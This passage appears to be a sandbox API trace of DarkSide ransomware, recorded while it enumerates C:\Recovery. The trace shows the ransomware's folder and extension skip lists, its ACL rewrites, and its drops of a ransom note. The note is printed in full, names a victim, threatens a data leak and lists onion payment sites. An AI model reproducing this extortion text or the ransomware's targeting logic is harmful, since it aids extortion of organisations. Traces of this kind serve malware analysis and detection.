[0136.350] _wcsicmp (_Str1="$windows.~bt", _Str2="Recovery") returned -78 [0136.350] wcslen (_String="$windows.~bt") returned 0xc [0136.350] _wcsicmp (_Str1="$windows.~ws", _Str2="Recovery") returned -78 [0136.350] wcslen (_String="$windows.~ws") returned 0xc [0136.350] _wcsicmp (_Str1="windows", _Str2="Recovery") returned 5 [0136.350] wcslen (_String="windows") returned 0x7 [0136.350] _wcsicmp (_Str1="appdata", _Str2="Recovery") returned -17 [0136.350] wcslen (_String="appdata") returned 0x7 [0136.350] _wcsicmp (_Str1="application data", _Str2="Recovery") returned -17 [0136.350] wcslen (_String="application data") returned 0x10 [0136.350] _wcsicmp (_Str1="boot", _Str2="Recovery") returned -16 [0136.350] wcslen (_String="boot") returned 0x4 [0136.350] _wcsicmp (_Str1="google", _Str2="Recovery") returned -11 [0136.350] wcslen (_String="google") returned 0x6 [0136.350] _wcsicmp (_Str1="mozilla", _Str2="Recovery") returned -5 [0136.350] wcslen (_String="mozilla") returned 0x7 [0136.350] _wcsicmp (_Str1="program files", _Str2="Recovery") returned -2 [0136.350] wcslen (_String="program files") returned 0xd [0136.350] _wcsicmp (_Str1="program files (x86)", _Str2="Recovery") returned -2 [0136.350] wcslen (_String="program files (x86)") returned 0x13 [0136.350] _wcsicmp (_Str1="programdata", _Str2="Recovery") returned -2 [0136.350] wcslen (_String="programdata") returned 0xb [0136.350] _wcsicmp (_Str1="system volume information", _Str2="Recovery") returned 1 [0136.351] wcslen (_String="system volume information") returned 0x19 [0136.351] _wcsicmp (_Str1="tor browser", _Str2="Recovery") returned 2 [0136.351] wcslen (_String="tor browser") returned 0xb [0136.351] _wcsicmp (_Str1="windows.old", _Str2="Recovery") returned 5 [0136.351] wcslen (_String="windows.old") returned 0xb [0136.351] _wcsicmp (_Str1="intel", _Str2="Recovery") returned -9 [0136.351] wcslen (_String="intel") returned 0x5 [0136.351] _wcsicmp (_Str1="msocache", _Str2="Recovery") returned -5 [0136.351] wcslen (_String="msocache") returned 0x8 [0136.351] _wcsicmp (_Str1="perflogs", _Str2="Recovery") returned -2 [0136.351] wcslen (_String="perflogs") returned 0x8 [0136.351] _wcsicmp (_Str1="x64dbg", _Str2="Recovery") returned 6 [0136.351] wcslen (_String="x64dbg") returned 0x6 [0136.351] _wcsicmp (_Str1="public", _Str2="Recovery") returned -2 [0136.351] wcslen (_String="public") returned 0x6 [0136.351] _wcsicmp (_Str1="all users", _Str2="Recovery") returned -17 [0136.351] wcslen (_String="all users") returned 0x9 [0136.351] _wcsicmp (_Str1="default", _Str2="Recovery") returned -14 [0136.351] wcslen (_String="default") returned 0x7 [0136.351] wcscpy (in: _Dest=0x2dd4d50, _Source="\\\\?\\C:\\*" | out: _Dest="\\\\?\\C:\\*") returned="\\\\?\\C:\\*" [0136.351] wcslen (_String="\\\\?\\C:\\*") returned 0x8 [0136.351] wcscpy (in: _Dest=0x2dd4d5e, _Source="Recovery" | out: _Dest="Recovery") returned="Recovery" [0136.351] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x2df4d60 [0136.351] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x2e04d68 [0136.353] wcscpy (in: _Dest=0x2df4d60, _Source="\\\\?\\C:\\Recovery" | out: _Dest="\\\\?\\C:\\Recovery") returned="\\\\?\\C:\\Recovery" [0136.353] GetNamedSecurityInfoW () returned 0x0 [0136.353] SetEntriesInAclW () returned 0x0 [0136.353] SetNamedSecurityInfoW () returned 0x0 [0136.355] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2db8640) returned 1 [0136.355] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3fefbc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0136.355] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Recovery" (normalized: "c:\\recovery")) returned 1 [0136.355] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0136.355] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\recovery\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c [0136.356] WriteFile (in: hFile=0x1c, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fef8c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fef8c*=0xa8f, lpOverlapped=0x0) returned 1 [0136.357] CloseHandle (hObject=0x1c) returned 1 [0136.357] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0136.358] GetFileAttributesW (lpFileName="\\\\?\\C:\\Recovery" (normalized: "c:\\recovery")) returned 0x2016 [0136.358] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Recovery" | out: pszPath="\\\\?\\C:\\Recovery\\") returned="" [0136.358] wcslen (_String="\\\\?\\C:\\Recovery\\") returned 0x10 [0136.358] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Recovery\\*", fInfoLevelId=0x0, lpFindFileData=0x3ff1ec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3ff1ec) returned 0x2db8640 [0136.358] FindNextFileW (in: hFindFile=0x2db8640, lpFindFileData=0x3ff1ec | out: lpFindFileData=0x3ff1ec*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcfea1c80, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xcfea1c80, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0136.359] FindNextFileW (in: hFindFile=0x2db8640, lpFindFileData=0x3ff1ec | out: lpFindFileData=0x3ff1ec*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", cAlternateFileName="E9E239~1")) returned 1 [0136.359] _wcsicmp (_Str1="$recycle.bin", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned -65 [0136.359] wcslen (_String="$recycle.bin") returned 0xc [0136.359] _wcsicmp (_Str1="config.msi", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned -2 [0136.359] wcslen (_String="config.msi") returned 0xa [0136.359] _wcsicmp (_Str1="$windows.~bt", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned -65 [0136.359] wcslen (_String="$windows.~bt") returned 0xc [0136.359] _wcsicmp (_Str1="$windows.~ws", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned -65 [0136.359] wcslen (_String="$windows.~ws") returned 0xc [0136.359] _wcsicmp (_Str1="windows", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned 18 [0136.359] wcslen (_String="windows") returned 0x7 [0136.359] _wcsicmp (_Str1="appdata", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned -4 [0136.359] wcslen (_String="appdata") returned 0x7 [0136.359] _wcsicmp (_Str1="application data", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned -4 [0136.359] wcslen (_String="application data") returned 0x10 [0136.359] _wcsicmp (_Str1="boot", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned -3 [0136.359] wcslen (_String="boot") returned 0x4 [0136.359] _wcsicmp (_Str1="google", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned 2 [0136.359] wcslen (_String="google") returned 0x6 [0136.359] _wcsicmp (_Str1="mozilla", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned 8 [0136.359] wcslen (_String="mozilla") returned 0x7 [0136.359] _wcsicmp (_Str1="program files", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned 11 [0136.359] wcslen (_String="program files") returned 0xd [0136.359] _wcsicmp (_Str1="program files (x86)", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned 11 [0136.359] wcslen (_String="program files (x86)") returned 0x13 [0136.359] _wcsicmp (_Str1="programdata", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned 11 [0136.359] wcslen (_String="programdata") returned 0xb [0136.359] _wcsicmp (_Str1="system volume information", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned 14 [0136.359] wcslen (_String="system volume information") returned 0x19 [0136.359] _wcsicmp (_Str1="tor browser", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned 15 [0136.360] wcslen (_String="tor browser") returned 0xb [0136.360] _wcsicmp (_Str1="windows.old", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned 18 [0136.360] wcslen (_String="windows.old") returned 0xb [0136.360] _wcsicmp (_Str1="intel", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned 4 [0136.360] wcslen (_String="intel") returned 0x5 [0136.360] _wcsicmp (_Str1="msocache", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned 8 [0136.360] wcslen (_String="msocache") returned 0x8 [0136.360] _wcsicmp (_Str1="perflogs", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned 11 [0136.360] wcslen (_String="perflogs") returned 0x8 [0136.360] _wcsicmp (_Str1="x64dbg", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned 19 [0136.360] wcslen (_String="x64dbg") returned 0x6 [0136.360] _wcsicmp (_Str1="public", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned 11 [0136.360] wcslen (_String="public") returned 0x6 [0136.360] _wcsicmp (_Str1="all users", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned -4 [0136.360] wcslen (_String="all users") returned 0x9 [0136.360] _wcsicmp (_Str1="default", _Str2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned -1 [0136.360] wcslen (_String="default") returned 0x7 [0136.360] wcscpy (in: _Dest=0x2e04d68, _Source="\\\\?\\C:\\Recovery\\*" | out: _Dest="\\\\?\\C:\\Recovery\\*") returned="\\\\?\\C:\\Recovery\\*" [0136.360] wcslen (_String="\\\\?\\C:\\Recovery\\*") returned 0x11 [0136.360] wcscpy (in: _Dest=0x2e04d88, _Source="e9e23962-4a25-11e7-88e8-91fb2ec43f0b" | out: _Dest="e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned="e9e23962-4a25-11e7-88e8-91fb2ec43f0b" [0136.360] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4470048 [0136.361] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4480050 [0136.362] wcscpy (in: _Dest=0x4470048, _Source="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b" | out: _Dest="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b") returned="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b" [0136.362] GetNamedSecurityInfoW () returned 0x0 [0136.362] SetEntriesInAclW () returned 0x0 [0136.362] SetNamedSecurityInfoW () returned 0x0 [0136.364] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x597e10) returned 1 [0136.364] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3fed3c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0136.364] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b")) returned 1 [0136.364] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0136.364] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c [0136.364] WriteFile (in: hFile=0x1c, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fed0c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fed0c*=0xa8f, lpOverlapped=0x0) returned 1 [0136.365] CloseHandle (hObject=0x1c) returned 1 [0136.365] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0136.365] GetFileAttributesW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b")) returned 0x2016 [0136.365] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b" | out: pszPath="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\") returned="" [0136.365] wcslen (_String="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\") returned 0x35 [0136.365] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*", fInfoLevelId=0x0, lpFindFileData=0x3fef6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fef6c) returned 0x2db8700 [0136.365] FindNextFileW (in: hFindFile=0x2db8700, lpFindFileData=0x3fef6c | out: lpFindFileData=0x3fef6c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcfec7de0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xcfec7de0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0136.366] FindNextFileW (in: hFindFile=0x2db8700, lpFindFileData=0x3fef6c | out: lpFindFileData=0x3fef6c*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x27c2fae0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x4185decd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x306000, dwReserved0=0x0, dwReserved1=0x0, cFileName="boot.sdi", cAlternateFileName="")) returned 1 [0136.366] _wcsicmp (_Str1="boot.sdi", _Str2="README.c06622a1.TXT") returned -16 [0136.366] wcsstr (_Str="boot.sdi", _SubStr="README") returned 0x0 [0136.366] _wcsicmp (_Str1="autorun.inf", _Str2="boot.sdi") returned -1 [0136.366] wcslen (_String="autorun.inf") returned 0xb [0136.366] _wcsicmp (_Str1="boot.ini", _Str2="boot.sdi") returned -10 [0136.366] wcslen (_String="boot.ini") returned 0x8 [0136.366] _wcsicmp (_Str1="bootfont.bin", _Str2="boot.sdi") returned 56 [0136.366] wcslen (_String="bootfont.bin") returned 0xc [0136.366] _wcsicmp (_Str1="bootsect.bak", _Str2="boot.sdi") returned 69 [0136.366] wcslen (_String="bootsect.bak") returned 0xc [0136.366] _wcsicmp (_Str1="desktop.ini", _Str2="boot.sdi") returned 2 [0136.366] wcslen (_String="desktop.ini") returned 0xb [0136.367] _wcsicmp (_Str1="iconcache.db", _Str2="boot.sdi") returned 7 [0136.367] wcslen (_String="iconcache.db") returned 0xc [0136.367] _wcsicmp (_Str1="ntldr", _Str2="boot.sdi") returned 12 [0136.367] wcslen (_String="ntldr") returned 0x5 [0136.367] _wcsicmp (_Str1="ntuser.dat", _Str2="boot.sdi") returned 12 [0136.367] wcslen (_String="ntuser.dat") returned 0xa [0136.367] _wcsicmp (_Str1="ntuser.dat.log", _Str2="boot.sdi") returned 12 [0136.367] wcslen (_String="ntuser.dat.log") returned 0xe [0136.367] _wcsicmp (_Str1="ntuser.ini", _Str2="boot.sdi") returned 12 [0136.367] wcslen (_String="ntuser.ini") returned 0xa [0136.367] _wcsicmp (_Str1="thumbs.db", _Str2="boot.sdi") returned 18 [0136.367] wcslen (_String="thumbs.db") returned 0x9 [0136.367] _wcsicmp (_Str1="386", _Str2="sdi") returned -64 [0136.367] wcslen (_String="386") returned 0x3 [0136.367] _wcsicmp (_Str1="adv", _Str2="sdi") returned -18 [0136.367] wcslen (_String="adv") returned 0x3 [0136.367] _wcsicmp (_Str1="ani", _Str2="sdi") returned -18 [0136.367] wcslen (_String="ani") returned 0x3 [0136.367] _wcsicmp (_Str1="bat", _Str2="sdi") returned -17 [0136.367] wcslen (_String="bat") returned 0x3 [0136.367] _wcsicmp (_Str1="bin", _Str2="sdi") returned -17 [0136.367] wcslen (_String="bin") returned 0x3 [0136.367] _wcsicmp (_Str1="cab", _Str2="sdi") returned -16 [0136.367] wcslen (_String="cab") returned 0x3 [0136.367] _wcsicmp (_Str1="cmd", _Str2="sdi") returned -16 [0136.367] wcslen (_String="cmd") returned 0x3 [0136.367] _wcsicmp (_Str1="com", _Str2="sdi") returned -16 [0136.367] wcslen (_String="com") returned 0x3 [0136.367] _wcsicmp (_Str1="cpl", _Str2="sdi") returned -16 [0136.367] wcslen (_String="cpl") returned 0x3 [0136.367] _wcsicmp (_Str1="cur", _Str2="sdi") returned -16 [0136.367] wcslen (_String="cur") returned 0x3 [0136.367] _wcsicmp (_Str1="deskthemepack", _Str2="sdi") returned -15 [0136.367] wcslen (_String="deskthemepack") returned 0xd [0136.367] _wcsicmp (_Str1="diagcab", _Str2="sdi") returned -15 [0136.367] wcslen (_String="diagcab") returned 0x7 [0136.368] _wcsicmp (_Str1="diagcfg", _Str2="sdi") returned -15 [0136.368] wcslen (_String="diagcfg") returned 0x7 [0136.368] _wcsicmp (_Str1="diagpkg", _Str2="sdi") returned -15 [0136.368] wcslen (_String="diagpkg") returned 0x7 [0136.368] _wcsicmp (_Str1="dll", _Str2="sdi") returned -15 [0136.368] wcslen (_String="dll") returned 0x3 [0136.368] _wcsicmp (_Str1="drv", _Str2="sdi") returned -15 [0136.368] wcslen (_String="drv") returned 0x3 [0136.368] _wcsicmp (_Str1="exe", _Str2="sdi") returned -14 [0136.368] wcslen (_String="exe") returned 0x3 [0136.368] _wcsicmp (_Str1="hlp", _Str2="sdi") returned -11 [0136.368] wcslen (_String="hlp") returned 0x3 [0136.368] _wcsicmp (_Str1="icl", _Str2="sdi") returned -10 [0136.368] wcslen (_String="icl") returned 0x3 [0136.368] _wcsicmp (_Str1="icns", _Str2="sdi") returned -10 [0136.368] wcslen (_String="icns") returned 0x4 [0136.368] _wcsicmp (_Str1="ico", _Str2="sdi") returned -10 [0136.368] wcslen (_String="ico") returned 0x3 [0136.368] _wcsicmp (_Str1="ics", _Str2="sdi") returned -10 [0136.368] wcslen (_String="ics") returned 0x3 [0136.368] _wcsicmp (_Str1="idx", _Str2="sdi") returned -10 [0136.368] wcslen (_String="idx") returned 0x3 [0136.368] _wcsicmp (_Str1="ldf", _Str2="sdi") returned -7 [0136.368] wcslen (_String="ldf") returned 0x3 [0136.368] _wcsicmp (_Str1="lnk", _Str2="sdi") returned -7 [0136.368] wcslen (_String="lnk") returned 0x3 [0136.368] _wcsicmp (_Str1="mod", _Str2="sdi") returned -6 [0136.368] wcslen (_String="mod") returned 0x3 [0136.368] _wcsicmp (_Str1="mpa", _Str2="sdi") returned -6 [0136.368] wcslen (_String="mpa") returned 0x3 [0136.368] _wcsicmp (_Str1="msc", _Str2="sdi") returned -6 [0136.368] wcslen (_String="msc") returned 0x3 [0136.368] _wcsicmp (_Str1="msp", _Str2="sdi") returned -6 [0136.368] wcslen (_String="msp") returned 0x3 [0136.368] _wcsicmp (_Str1="msstyles", _Str2="sdi") returned -6 [0136.368] wcslen (_String="msstyles") returned 0x8 [0136.368] _wcsicmp (_Str1="msu", _Str2="sdi") returned -6 [0136.369] wcslen (_String="msu") returned 0x3 [0136.369] _wcsicmp (_Str1="nls", _Str2="sdi") returned -5 [0136.369] wcslen (_String="nls") returned 0x3 [0136.369] _wcsicmp (_Str1="nomedia", _Str2="sdi") returned -5 [0136.369] wcslen (_String="nomedia") returned 0x7 [0136.369] _wcsicmp (_Str1="ocx", _Str2="sdi") returned -4 [0136.369] wcslen (_String="ocx") returned 0x3 [0136.369] _wcsicmp (_Str1="prf", _Str2="sdi") returned -3 [0136.369] wcslen (_String="prf") returned 0x3 [0136.369] _wcsicmp (_Str1="ps1", _Str2="sdi") returned -3 [0136.369] wcslen (_String="ps1") returned 0x3 [0136.369] _wcsicmp (_Str1="rom", _Str2="sdi") returned -1 [0136.369] wcslen (_String="rom") returned 0x3 [0136.369] _wcsicmp (_Str1="rtp", _Str2="sdi") returned -1 [0136.369] wcslen (_String="rtp") returned 0x3 [0136.369] _wcsicmp (_Str1="scr", _Str2="sdi") returned -1 [0136.369] wcslen (_String="scr") returned 0x3 [0136.369] _wcsicmp (_Str1="shs", _Str2="sdi") returned 4 [0136.369] wcslen (_String="shs") returned 0x3 [0136.369] _wcsicmp (_Str1="spl", _Str2="sdi") returned 12 [0136.369] wcslen (_String="spl") returned 0x3 [0136.369] _wcsicmp (_Str1="sys", _Str2="sdi") returned 21 [0136.369] wcslen (_String="sys") returned 0x3 [0136.369] _wcsicmp (_Str1="theme", _Str2="sdi") returned 1 [0136.369] wcslen (_String="theme") returned 0x5 [0136.369] _wcsicmp (_Str1="themepack", _Str2="sdi") returned 1 [0136.369] wcslen (_String="themepack") returned 0x9 [0136.369] _wcsicmp (_Str1="wpx", _Str2="sdi") returned 4 [0136.369] wcslen (_String="wpx") returned 0x3 [0136.369] _wcsicmp (_Str1="lock", _Str2="sdi") returned -7 [0136.369] wcslen (_String="lock") returned 0x4 [0136.369] _wcsicmp (_Str1="key", _Str2="sdi") returned -8 [0136.369] wcslen (_String="key") returned 0x3 [0136.369] _wcsicmp (_Str1="hta", _Str2="sdi") returned -11 [0136.369] wcslen (_String="hta") returned 0x3 [0136.369] _wcsicmp (_Str1="msi", _Str2="sdi") returned -6 [0136.369] wcslen (_String="msi") returned 0x3 [0136.369] _wcsicmp (_Str1="pdb", _Str2="sdi") returned -3 [0136.370] wcslen (_String="pdb") returned 0x3 [0136.370] _wcsicmp (_Str1="sql", _Str2="sdi") returned 13 [0136.370] wcslen (_String="sql") returned 0x3 [0136.370] _wcsicmp (_Str1="sqlite", _Str2="sdi") returned 13 [0136.370] wcslen (_String="sqlite") returned 0x6 [0136.370] GetFileAttributesW (lpFileName="\\\\?\\C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b")) returned 0x2016 [0136.370] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44a0060 [0136.370] wcscpy (in: _Dest=0x44a0060, 